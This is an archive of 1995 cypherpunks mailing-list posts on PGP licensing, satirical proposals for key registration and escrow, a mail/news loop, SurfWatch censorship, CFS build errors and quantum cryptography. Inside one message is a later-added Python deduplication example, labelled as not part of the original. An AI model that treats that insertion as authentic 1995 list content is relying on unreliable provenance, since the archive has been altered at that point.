>re-trying to get a socket connect to the master until it succeeds, so
>when you next go on-line ...  wham it gets through again as
>connectivity is resumed and says whatever it has been trying to say.
>We need it to retry in case of network out (or horror) big master
>falling over, until it gets resumed.

On many machines that will mean that it will try to initiate a connection
to the host. Please allow for a manual connect option.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAwdryoZzwIn1bdtAQHrDwGArifMl83/simhOGutmo8FhYgtCMZ+9g5E
stSoeOysXuLCvv3EK3PTTUO4LdtPbhnn
=rq/L
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Tue, 18 Jul 95 16:53:03 PDT
To: stewarts@ix.netcom.com
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507182255.PAA06275@ix5.ix.netcom.com>
Message-ID: <9507182352.AA11660@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



   Date: Tue, 18 Jul 1995 15:57:54 -0700
   From: stewarts@ix.netcom.com (Bill Stewart)
   Cc: info@webster.com
   Sender: owner-cypherpunks@toad.com

   At 11:36 PM 7/17/95 -0700, Greg Broiles wrote:
   >Consistent with the trend towards treating employees like children,

   I'm not surprised someone sees a market for this.  I've worked at
   a number of customer sites that block access to 900 numbers and
   local pay-per-call numbers, which also blocks access to Time-of-day
   and some vendors' customer-support numbers.

Also 911 apparently, I've heard...

-- 
david taffs <dat@ebt.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 18 Jul 95 16:58:49 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
In-Reply-To: <9507182330.AA23645@cfdevx1.lehman.com>
Message-ID: <199507182358.QAA10553@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Rick Busdiecker <rfb@lehman.com> writes:
>   From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>

>   In practice, I'd probably buy Viacrypt for legal reasons but use
>   PGP anyway.

>I'd be interested in hearing some of the lawyers out there comment on
>this.

Does RSADSI count as having lawyers?  So far as I know they have not
commented in public about whether the ViaCrypt license is valid, but
they have also not (to my knowledge) contested it.  However, Jim Bidzos
has explicitly said that it is not acceptable to buy a ViaCrypt license
to cover your use of non-ViaCrypt PGP.

	Jim Gillogly
	Hevensday, 25 Afterlithe S.R. 1995, 23:53




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 18 Jul 95 08:37:07 PDT
To: Andrew.Spring@ping.be
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <9507181535.AA21841@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> >1. If the bill becomes law, how can someone who violates it be
> >punished?
> >
> 
> - From the top of my head:
> Subpoena your service provider's computer records. 


That's not a problem. He will find a lot of encrypted
messages and images of nude girls. Neither is illegal. :-)


> Intimidate your roommate
> into testifying against you.  

I don't have a roommate.


> Tapping your phone. 


I use encrypted modem connections and Nautilus.



> Feds are in the business of putting people behind bars.  They are _very_ good
> at it.

That's the question. How long can they put me behind bars?




> I'm betting that the Feds will adopt as a working definition anything that
> requires a key to decrypt the communications.  That means compression
> software, rot13, and most hash functions are ok.

rot13 is not ok, 13 is the key. Someone should register at the department. :-)



> Expert Testimony:  "We experimented with 113,296 keys chosen at random and
> the defendant's algorithm took an average of 29,000 years to find each one.
> It is our professional opinion, therefore, that the defendant is jacking us
> around and ought to be keelhauled".

Oh boy, wonderful experts....



Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 18 Jul 95 17:27:21 PDT
To: perry@imsi.com (Perry E. Metzger)
Subject: Re: We appear...
In-Reply-To: <9507182318.AA08206@webster.imsi.com>
Message-ID: <hyEDwkkAsCDI084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jul 95, perry@imsi.com (Perry E. Metzger) wrote:
> We appear to have an nntp/mail loop in progress. I believe the problem
> is at mnemosyne.cs.du.edu -- it's posting cypherpunks back to the
> mailing list (ugh!).

Yes, and I suppose everyone got the message I stupidly sent to the
list rather than to majordomo trying to figure this out...sorry.

This list is supposed to be gated to a Nyx newsgroup via
cypherpunks@cs.du.edu, as I recall, but is also being sent to
cypherpunks@nyx.cs.du.edu, and to a couple of individual users:

apoulter@nyx.cs.du.edu (Alan  Poulter)
cypherpunks@nyx.cs.du.edu
jannis@nyx10.cs.du.edu
cypherpunks@cs.du.edu

I'm not sure if this is related to the crash; I was getting a few
double postings from mnemosyne before the crash, but they seem to
have increased.  I've Cc:'d the sysadmin at DU, but removing the
cypherpunks@nyx.cs.du.edu subscription might be in order.  BTW,
mnemosyne is the news server at DU...

If it keeps up, I have no doubt someone will forge an unsubscribe
request...:-)  Anyway, maybe Hugh and/or Andrew can solve this in
a less hackish manner...


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 18 Jul 95 17:29:33 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: We appear...
In-Reply-To: <199507190006.UAA17547@thor.cs.umass.edu>
Message-ID: <Pine.LNX.3.91.950718182747.580H-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jul 1995, L. McCarthy wrote:

> Date: Tue, 18 Jul 1995 20:06:40 -0400 (EDT)
> From: L. McCarthy <lmccarth@thor.cs.umass.edu>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Cc: cypherpunks-owner@toad.com
> Subject: Re: We appear...
> 
> .pm writes:
> > We appear to have an nntp/mail loop in progress. I believe the problem
> > is at mnemosyne.cs.du.edu -- it's posting cypherpunks back to the
> > mailing list (ugh!).
> 
> Not exclusively, though -- I've been seeing sporadic stuff from mnemosyne for
> a week or more. I wrote to postmaster@cs.du.edu and it bounced from someone's
> personal mailbox (!)

folks,  the problem is this:  the cypherpunks mailing list is read as a 
newsgroup on nyx.cs.du.edu.  it seems they must have messed up their 
config recently otherwise we would have been seeing this for more than a 
year.  anyway, i wrote the sysadmin at nyx.cs.du.edu (aburt@nyx...) so 
hopefully this will be taken care of soon.

-pat


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** crypto for the masses!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 18 Jul 95 17:40:51 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: cfs for linux
Message-ID: <Pine.LNX.3.91.950718183640.580I-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks,

some time ago i inquired about an encryption program for linux.  i 
eventually obtained cfs from Matt Blaze (thanks...).  i haven't dealt 
with this for some time but i have been unable to compile it.  

if anyone running linux has it working i'd appreciate hearing from you. 

here are the errors i get if anyone is interested...

       zifi:~/projects/cfs> make
       cc -O   -c cfs_adm.c -o cfs_adm.o
       cfs_adm.c: In function `admproc_null_2':
       cfs_adm.c:47: number of arguments doesn't match prototype
       admproto.h:183: prototype declaration
       cfs_adm.c: In function `admproc_attach_2':
       cfs_adm.c:54: argument `rp' doesn't match prototype
       admproto.h:186: prototype declaration
       cfs_adm.c: In function `admproc_detach_2':
       cfs_adm.c:155: argument `rp' doesn't match prototype
       admproto.h:189: prototype declaration
       make: *** [cfs_adm.o] Error 1


thanks,

- -pat

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** crypto for the masses!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAxUm03Qo/lG0AH5AQE4DAQAoxA44ESm/7xQ1ke+8yo2VqCemmlrKJkh
2vuJnC4lhayAWEHzKuiqf3G3AAPHHqQdX8JBGNZWt0TAuyoGMWTRI2/U0jTe82AC
ew4Y6WzZTEvmdxHaxTFU9R2q6MUOGe4U6Bmdt8tMeU2hy5jDvoijgdiSfBJrU9eS
p2Cd2eigAFs=
=cQCG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Tue, 18 Jul 95 11:52:22 PDT
To: gnu@toad.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
In-Reply-To: <9504192139.AA00379@toad.com>
Message-ID: <m0sYLQw-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In April, gnu asked:
> Herb Lin called today to ask if the Cypherpunks could come up with a
> list of questions for their panel to ask the law enforcement community
> about crypto policy.  They will be meeting with senior law enforcement
> officials like FBI Director Freeh a week or so from now.

Did we ever get any feedback on this?

- -- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMAw6JRqU5+N/mI7JAQEWQQP/UCKWs1m8cMbbG7pAk7CKPjKSAP9yJLvw
m+vBFcC+TuFPrQSEjhK7s4qJnck3IzIXl7AmV70NFkr9Dc1Wni7YHkrfhx0nnRRe
7F131pKMNlgypyX/u3FaEHXtCxQV9R5IpYzBAGpvQ++3dzR7LdXcvS2I7kvcWf2G
6knV4KwHvp4=
=9+ER
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 18 Jul 95 18:56:48 PDT
To: cypherpunks@toad.com
Subject: Mandatory key registration
Message-ID: <9507190156.AA00268@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In the event of legally required key registration,
I would like to continue to use PGP.  My private RSA 
key is my own business, so I would like to comply 
with the requirements by registering my IDEA keys 
instead.  There are approximately 2**128 of them, and
I'm not quite sure which one will be used next, so 
can I just register ALL of them?  Can I do this on-line?
If all the cypherpunks use the same key set, must we each 
register all of them, or will a single list do?
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Tue, 18 Jul 95 16:04:57 PDT
To: cypherpunks@toad.com
Subject: Commercenet document on cryptography
Message-ID: <v01520d02ac320a1e64c0@[192.107.41.251]>
MIME-Version: 1.0
Content-Type: text/plain


I found the following on CommerceNet:

  http://www.commerce.net/information/position/position.062695.html

  Toward Enabling Secure Electronic Commerce:
  The Need for a Revised U.S. Cryptographic
  Policy

  by CommerceNet Network Services Working Group

It seems to address all the issues.


--
Steven Weller  <Windsor Consulting Group>         +1 502 454 0054 (voice)
OS-9 Consultancy and Software                       +1 502 451 5935 (fax)
Finger for public key    00 02 3C 2F 83 76 D3 77  2A 95 E8 90 94 9A 9D 74
http://iglou.com/windsorgrp   stevenw@iglou.com or realtime@well.sf.ca.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 18 Jul 95 17:34:26 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD6103.0003000176.uuout@famend.com>
Message-ID: <8AD747E.00030001AC.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PE> Rather than spend five minutes writing something on your own you'd end
PE> up something that looks totally fake.  I believe that what is going on

  No, that's "rather than not writing anything at all". I know how to
call and write to my congresscritters. The idea of the WWW page is for
those who wouldn't take the initiative to do it in the first place.

PE> would be discerned by a staffer in moments. Crap like this is called

  They should know, because they send form letters to constituents all
the time, only they don't bother to vary it a bit.

PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.

  Meanwhile, back at the ranch... If one of our DC members can set up an
Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
send things in their own words, if possible, and if they don't have any
words of their own, they can borrow some. Boilerplate has to be better
than nothing.



 * Is there such a thing as a "gruntled" Postal employee?
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 18 Jul 95 17:34:21 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Root Causes
In-Reply-To: <8AD533C.000300016D.uuout@famend.com>
Message-ID: <8AD747E.00030001AB.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


[Disclaimer: IASNAL, but I am the host of the Bill of Rights Conference
on the U'NI echonet, where these issues are discussed from time to time.]

JR> >violation of the right to privacy?
JR>
JR> Good idea, but I have an idea to upset even *more* people.

                    [9th and 10th Amendment stuff]

  Them, too.

JR> Republicans AND Democrats ALL HATE the 9th Amendment, which is the primary

  The reason there was no BOR in the original Constitution was precisely
that some folks were afraid that the enumeration of some rights would
imply that there are none other. The DOI and other writings of the FFs
clearly show that rights are naturally inherent in individual human
beans, and that the power of government comes from us, not the other way
around. But the FFs also knew that the prevailing view was that rights
are what is left over after the government is done flexing its muscles.

  Bottom line: The Bill of Rights was passed in the Congress as a
12-article gang-bang amendment, and the 10 of them that became the BOR
were passed as an organic whole by the several states. [And, of the
other two articles, which clearly didn't belong in a BOR, one of them
was ratified a few years ago even.] This means that without =any= of the
10 amendments, there would be =no= BOR.


JR> slow erosion of freedom in this country. My rejoinder is "OK, if we're
JR> supposed to ignore it, why not just REPEAL it, after all, it's just sitting
JR> there doing nothing, cluttering up the rest of the Bill of Rights." Usually,

  Don't give them any ideas! The 2nd is already on that list, and part
of the 1st (that refers to "flag desecration", which apparently is more
serious than =Constitution= desecration)... don't get me started, I'm
way off crypto already.

JR> talking about Constitutional issues on encryption rights, if for no other
JR> reason than to educate the public. In court, of course, I would concentrate
JR> on the 1st. Apologies to the various lurking law professors on the list, I

  Actually, I would kick in 2 and 4. The government has called crypto a
munition, and it =is= a valuable tool for the unorganized militia to
fight a guerilla war against an occupation force. The 4th amendment
protections against search and seizure are the moon which creates the
penumbra of Roe v. Wade.

> U'NInet Bill of Rights Conference Host

 * Physician, heal thyself!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Sat, 19 Aug 95 18:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
In-Reply-To: <Pine.BSI.3.91.950818102219.6463B-100000@usis.com>
Message-ID: <jDEDw4NQnUXH084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.BSI.3.91.950818102219.6463B-100000@usis.com>,
David Neal <dneal@usis.com> wrote:
-=}On Fri, 18 Aug 1995, David K. Merriman wrote:

-=}> I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
-=}> that key storage will be on an old 40M RLL drive on an 8088 machine, so
-=}> retrieval may be a bit slow and unreliable.......

-=}Same here -- I have an original Compaq "Sewing Machine" Portable with
-=}a 40MB hard card.  Of course the HD sticks and needs a good whacking
-=}sometimes, and the last floppy came out of the drive smoking and
-=}covered in grease.  (You DO have a 5 1/4" 360K floppy don't you?)
-=}
-=}My service, however is $2.  That's because all keys are encrypted against
-=}my key, which is unfortunately escrowed with the fellow listed above.
-=}
-=}Sorry about having to pass along the extra costs. :-)

I'll escrow my key with David, encrypt yours with it then
print it out and store it in a secure filing cabinet in the
salt mines near detroit.

I'll need to charge $3.00 per key, overhead you know.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Tue, 18 Jul 95 16:18:30 PDT
To: cypherpunks@toad.com
Subject: We appear...
Message-ID: <9507182318.AA08206@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


We appear to have an nntp/mail loop in progress. I believe the problem
is at mnemosyne.cs.du.edu -- it's posting cypherpunks back to the
mailing list (ugh!).

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 18 Jul 95 19:21:18 PDT
To: cypherpunks@toad.com
Subject: Re: Mandatory key registration
Message-ID: <ac31ba320a0210047bdd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:56 AM 7/19/95, rick hoselton wrote:
>In the event of legally required key registration,
>I would like to continue to use PGP.  My private RSA
>key is my own business, so I would like to comply
>with the requirements by registering my IDEA keys
>instead.  There are approximately 2**128 of them, and
>I'm not quite sure which one will be used next, so
>can I just register ALL of them?  Can I do this on-line?
>If all the cypherpunks use the same key set, must we each
>register all of them, or will a single list do?

It seems likely to me that an actual GAK system will require some fee per key.

For example, one might have to send in a form, maybe a diskette, and a $25
per key fee for "handling costs."

This is the way automobile registrations are handled (and they have become
a "revenue source"..I pay $450 per year to register my truck!!!).

This makes trying to register 2^128 keys rather expensive.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 18 Jul 95 16:32:39 PDT
To: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
Subject: Re: Is it legal for commercial companies to use PGP?
In-Reply-To: <5ZsF9c6w165w@voxbox.norden1.com>
Message-ID: <9507182330.AA23645@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
    Date: Tue, 18 Jul 95 09:36:51 EDT

    In practice, I'd probably buy Viacrypt for legal reasons but use
    PGP anyway.

I'd be interested in hearing some of the lawyers out there comment on
this.  While I know that I can test interoperability, I prefer using
something that I compiled myself which I think is not an option with
Viacrypt.  This is not to say that I could swear that I understand all
of the code that I compiled for the free versions of PGP, but (a) I
have spent considerable time looking at the parts that were most
interesting to me -- even translating some things to other programming
languages and (b) I know that others have also examined the code and
nobody has come up with anything terribly damning.

			Rick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAxDnpNR+/jb2ZlNAQGSWgP/QpeKiOTHFo9x9OMqHyO0iyUoF0RPkZL3
iRnIWNNKCdRWPw4jc6j0m3toG7mnvBt5v/jK122nrbeZBbzEpxGgovA2imOKeD9e
r09irO0Yo7G/T12yXgHOoaJ+69OPUhQFIUnPJGAJ2o5uEaLzRUlfDcsHQYtcx6sT
aRCR9NsbDMM=
=JsSF
-----END PGP SIGNATURE-----

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@PrimeNet.Com>
Date: Tue, 18 Jul 95 12:37:57 PDT
To: Buford Terrell <terrell@sam.neosoft.com>
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <199507181832.NAA27559@sam.neosoft.com>
Message-ID: <Pine.BSI.3.91.950718193426.3567B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jul 1995, Buford Terrell wrote:

> >
> >>> >and, conspiracy theories notwithstanding, we the people do not govern 
> >>> >America --we are only given a short list of politicians who have sold 
> >>> >their soul to CFR's satanist inner circle.
> >>> 
> >>> What's CFR?
> >>> 
> >>
> >>Council on Foreign Relations.
> >
> >or Code of Federal Regulations.
> >
> or Cypherpunks Fuming and Ranting
>   
>   --buford
> 

    aw right!  I like that last one --it fits!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 18 Jul 95 16:48:14 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507182255.PAA06275@ix5.ix.netcom.com>
Message-ID: <199507182354.TAA20153@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:

> >its list of interesting (err, forbidden) sites priced at $1,500. 
> Wow!  Folks have finally found a way to get paid for looking for porn on the
> net! :-)
> Surfwatch doesn't make its censored list easily available (otherwise it'd
> probably get pirated, or used as an "interesting sites" index...), but
> apparently it blocks access to things other than just pornography - does
> Webster indicate what categories of stuff they're blocking?

I think there's a definite need here. If some obliging soul can "blow the
whistle" by posting to the net 1) Surfwatch's list of banned sites, and/or
2) the criteria Surfwatch uses when determining what sites to block, it
would certainly be beneficial. At the very least, it would allow everyone
to see what sort of information they believe is "harmful to minors".

-- 

 frogfarm@yakko.cs.wmich.edu | To ensure ABSOLUTE FREEDOM, take RESPONSIBILITY
    imschira@nyx10.cs.du.edu | Encrypt! Encrypt! All-One-Key! Complete Privacy
             Damaged Justice | through Complex Mathematics! God's law PREVENTS
Need net.help? I'm available | decryption above 1024 bytes - Exceptions? None!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Tue, 18 Jul 95 17:06:51 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: We appear...
In-Reply-To: <9507182318.AA08206@webster.imsi.com>
Message-ID: <199507190006.UAA17547@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


.pm writes:
> We appear to have an nntp/mail loop in progress. I believe the problem
> is at mnemosyne.cs.du.edu -- it's posting cypherpunks back to the
> mailing list (ugh!).

Not exclusively, though -- I've been seeing sporadic stuff from mnemosyne for
a week or more. I wrote to postmaster@cs.du.edu and it bounced from someone's
personal mailbox (!)

Duplicates of some of Bob Hayden's articles have been appearing via NNTP
from krypton.mankato.msu.edu lately, too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Tue, 18 Jul 95 17:54:59 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Quantum computing/crypto
Message-ID: <Pine.SOL.3.91.950718201132.22080B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


C-punx,

Before the list cratered I had been intending to respond to Doug 
Hughes post about the quantum computing news piece by James Glanz in 
SCIENCE magazine, 7th July, vol. 269, pg. 28-29.

If you are reading this thread you may be aware of Peter Shor's 
development of an algorithm that uses quantum logic to factor large 
numbers.  This was discussed on the list last year and the general take 
on it was that there was no way to build a functioning quantum computer, 
and even if there were the code-maker would end up ahead of the code 
breaker.  

Well, it seems that his work stimulated some further interest in 
the design and construction of quantum computers and even a conference in 
Torino, Italy a few weeks ago.  In the 15th May Physical Review Letters 
there are a number of papers on QC's, including one by Ignacio Cirac & 
Peter Zoller that describes the construction of a quantum logic gate.  
This builds on an article in the same issue of PRL by Artur Ekert, 
David Deutsch and Adriano Barenco describing how by trapping ions 
in an electric field just above zero degrees Kelvin one can build a 
"quantum wire" which will pass information without measuring it (and 
therefore collapsing the quantum uncertainty).  Chris Monroe and David 
Wineland at NIST in Boulder have already built a simplified version of 
this quantum logic gate device, and have written a proposal to factor 
the number 15 using the technique.  The hardware involved will be about 
10 mercury atoms.  

There is airtime at the end of the piece for skeptics citing the 
calculations showing that "small errors in a QC can accumulate 
exponentially and no one has figured out a satisfactory way of reaching 
into the quantum world to correct them".

As I mentioned before there is a sidebar talking about the successful 
demonstration of quantum cryptography over 14 kilometers of fiber optic 
cable in Los Alamos by Richard Hughes and colleagues, apparently 
announced at a conference held last month at the Univ. of Rochester in 
New York.  Alice and Bob can swap bits encoded in the quantum properties 
of photons that can't be intercepted without them knowing that something 
is amiss.
 

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 18 Jul 95 17:55:20 PDT
To: perry@imsi.com
Subject: Re: We appear...
In-Reply-To: <9507182318.AA08206@webster.imsi.com>
Message-ID: <199507190055.UAA01226@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| We appear to have an nntp/mail loop in progress. I believe the problem
| is at mnemosyne.cs.du.edu -- it's posting cypherpunks back to the
| mailing list (ugh!).

This very simple procmailrc rule means that you never notice such
ugliness. 

:0 Wh: msgid.lock
| formail -D 65536 .msgid.cache


procmail:
ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/procmail.tar.gz


Adam
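
What the rule above relies on, as an added example (not part of the original message and not procmail/formail code): a gateway loop re-injects a post with new transport headers but the same Message-ID, so a bounded cache of recently seen IDs is enough to drop the copy. The class and function names and the sample messages are assumptions constructed here; the eviction policy only approximates formail's cache file.

```python
from collections import OrderedDict
from email import message_from_string


class MsgIdCache:
    """Bounded Message-ID cache, in the spirit of `formail -D maxlen idcache`."""

    def __init__(self, max_bytes=65536):
        self.max_bytes = max_bytes
        self.used = 0
        self.ids = OrderedDict()  # Message-ID -> bytes charged to the cache

    def is_duplicate(self, raw_message):
        """Return True if this Message-ID was seen already; else remember it."""
        msgid = (message_from_string(raw_message).get("Message-ID") or "").strip()
        if not msgid:
            return False  # no ID to key on: deliver rather than guess
        if msgid in self.ids:
            return True
        cost = len(msgid.encode()) + 1
        self.ids[msgid] = cost
        self.used += cost
        while self.used > self.max_bytes:  # forget the oldest IDs first
            _, freed = self.ids.popitem(last=False)
            self.used -= freed
        return False


def deliver(raw_messages, cache):
    """Return the Subject of every message that would reach the mailbox."""
    delivered = []
    for raw in raw_messages:
        if not cache.is_duplicate(raw):
            delivered.append(message_from_string(raw)["Subject"])
    return delivered


def make(msgid, subject, extra_headers=""):
    """Build a constructed sample message (not real list traffic)."""
    return (f"From: someone@example.org\n{extra_headers}"
            f"Message-ID: {msgid}\nSubject: {subject}\n\nbody\n")


# Constructed traffic: post 1, an unrelated post, then post 1 again after a
# news gateway re-injected it (new transport headers, same Message-ID).
SAMPLE = [
    make("<constructed-1@example.org>", "Quantum computing/crypto"),
    make("<constructed-2@example.org>", "Govt mandated key"),
    make("<constructed-1@example.org>", "Quantum computing/crypto",
         extra_headers="Path: news.example.net!gateway\nNewsgroups: example.list\n"),
]

if __name__ == "__main__":
    print(deliver(SAMPLE, MsgIdCache()))
```

A cache that is too small forgets IDs before the looped copy arrives, which is why the rule gives formail a generous size.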



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 18 Jul 95 18:03:11 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <5gog9c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Gillogly <jim@acm.org> writes:

> 
> > Rick Busdiecker <rfb@lehman.com> writes:
> >   From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
> 
> >   In practice, I'd probably buy Viacrypt for legal reasons but use
> >   PGP anyway.
> 
> >I'd be interested in hearing some of the lawyers out there comment on
> >this.
> 
> Does RSADSI count as having lawyers?  So far as I know they have not
> commented in public about whether the ViaCrypt license is valid, but
> they have also not (to my knowledge) contested it.  However, Jim Bidzos
> has explicitly said that it is not acceptable to buy a ViaCrypt license
> to cover your use of non-ViaCrypt PGP.

Hmm, does that make anyone besides me wonder about that unpublished source
code? 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 18 Jul 95 19:06:11 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: We appear...
In-Reply-To: <199507190006.UAA17547@thor.cs.umass.edu>
